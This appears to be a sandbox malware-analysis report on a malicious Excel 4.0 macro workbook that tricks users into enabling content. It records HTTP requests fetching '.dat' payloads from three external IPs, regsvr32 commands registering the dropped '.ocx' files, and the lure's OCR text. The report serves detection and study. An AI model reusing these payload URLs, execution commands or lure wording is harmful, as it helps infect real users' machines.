Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://www.odwebp.svc.msom
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNNG Thisfileorigin
Source: Screenshot number: 12 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 12 Screenshot OCR: Enable Macros ) Why I can not open this document? Sheet Ready O Type here to search i "I Ki
Source: Screenshot number: 16 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
Source: Screenshot number: 16 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 16 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Found Excel 4.0 Macro with suspicious formulas
Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: Sheet name: Tiposa1
Found a hidden Excel 4.0 Macro sheet
Source: ClaimCopy-1848214335-12022021.xlsb Macro extractor: Sheet name: Tiposa1
Source: ClaimCopy-1848214335-12022021.xlsb Macro extractor: Sheet name: Tiposa
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380D0 0_3_12F380D0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380D0 0_3_12F380D0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F3B140 0_3_12F3B140
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F3B140 0_3_12F3B140
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380AC 0_3_12F380AC
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380AC 0_3_12F380AC
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380D0 0_3_12F380D0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380D0 0_3_12F380D0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F3B140 0_3_12F3B140
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F3B140 0_3_12F3B140
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380AC 0_3_12F380AC
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Code function: 0_3_12F380AC 0_3_12F380AC
Source: ClaimCopy-1848214335-12022021.xlsb Virustotal: Detection: 8%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{9BF09C99-1BEE-4B64-994B-EDA637E32634} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal76.expl.evad.winXLSB@13/6@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: ClaimCopy-1848214335-12022021.xlsb Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: D1330000.0.dr Initial sample: OLE zip file path = xl/media/image1.jpg
Source: D1330000.0.dr Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.607513208.000000000F3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607425649.000000000F330000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: EXCEL.EXE, 00000000.00000002.605060026.000000000D4E1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Progman
Source: EXCEL.EXE, 00000000.00000002.602431128.0000000002B30000.00000002.00020000.sdmp Binary or memory string: Progmanlock
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs